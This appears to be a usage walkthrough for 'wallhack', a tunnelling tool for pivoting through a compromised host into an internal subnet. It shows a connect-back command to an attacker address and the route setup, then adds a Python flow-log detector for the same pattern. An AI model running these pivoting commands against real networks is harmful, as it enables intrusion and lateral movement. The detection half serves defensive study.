Single Hop Example
In this example, an entry node runs on the attacker machine (192.168.1.5) and a compromised host (10.0.1.5) connects back to it. Once established, traffic to 10.10.0.0/24 routes through the compromised host.
The binary reached the host via initial access — a web shell, RCE exploit, or similar foothold. Once transferred and marked executable, the exit node can be started.
With no arguments, wallhack listens on the default port and negotiates the entry role automatically.
$ wallhack
wallhack 0.6.2
Type 'help' for available commands.
wallhack> info
role: entry
listen addr: :6565
version: wallhack 0.6.2
uptime: 2s

Connecting back to the attacker. With no TUN capability available, the node negotiates the exit role automatically.

wallhack --connect 192.168.1.5

Back on the attacker, the REPL shows the connection:
[+] peer "pivot" connected (10.0.1.5:52341)
wallhack> peers
NAME   ADDR            STATUS     LATENCY  TUN  LISTEN  CONNECT
pivot  10.0.1.5:52341  connected  1.2ms    no   no      yes

Add routes for the networks reachable through the compromised host.
wallhack> route add 10.10.0.0/24
OK

With only one peer connected, the peer is inferred automatically. Use route add <cidr> via <peer> when multiple peers are connected.
To configure the OS route manually with ip route instead, run peers first to find the TUN device name (tun-<peer>).
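
Seen from the network's side, the session above leaves a recognisable sequence in flow logs: 10.0.1.5 opens a connection to the default port 6565, and afterwards connections into 10.10.0.0/24 originate from that same host. The following detection sketch is an added example, not part of wallhack or its documentation; the flow-record layout, the function name and the fan-out threshold are assumptions, and the records are constructed.

```python
import ipaddress
from collections import defaultdict

DEFAULT_PORT = 6565   # default listen port shown in the `info` output above
FANOUT_THRESHOLD = 3  # assumed: distinct watched-net targets before flagging

# Constructed flow records: (epoch seconds, source IP, destination IP, destination port)
FLOWS = [
    (100, "10.0.1.5", "10.0.1.20", 443),     # before any tunnel: not counted
    (120, "10.0.1.5", "192.168.1.5", 6565),  # connect-back to the entry node
    (130, "10.0.1.5", "10.10.0.10", 445),
    (131, "10.0.1.5", "10.10.0.11", 445),
    (135, "10.0.1.5", "10.10.0.12", 22),
    (140, "10.0.1.7", "10.10.0.10", 445),    # different host, no tunnel: ignored
    (150, "10.0.1.8", "192.168.1.5", 6565),  # tunnel opened, but no fan-out
]

def find_pivots(flows, watched_net, port=DEFAULT_PORT, threshold=FANOUT_THRESHOLD):
    """Return {src: sorted targets} for hosts that opened a connection to
    `port` and afterwards contacted at least `threshold` hosts in watched_net."""
    net = ipaddress.ip_network(watched_net)
    tunnel_start = {}           # src -> time of its first connection to `port`
    targets = defaultdict(set)  # src -> watched-net hosts contacted afterwards
    for ts, src, dst, dport in sorted(flows):
        if dport == port:
            tunnel_start.setdefault(src, ts)
        elif src in tunnel_start and ipaddress.ip_address(dst) in net:
            targets[src].add(dst)
    return {s: sorted(d) for s, d in targets.items() if len(d) >= threshold}

if __name__ == "__main__":
    for src, dsts in find_pivots(FLOWS, "10.10.0.0/24").items():
        print(f"possible pivot: {src} -> {', '.join(dsts)}")
```

Matching on 6565 covers only the default port, so the fan-out half of the check is the part worth keeping when the port differs.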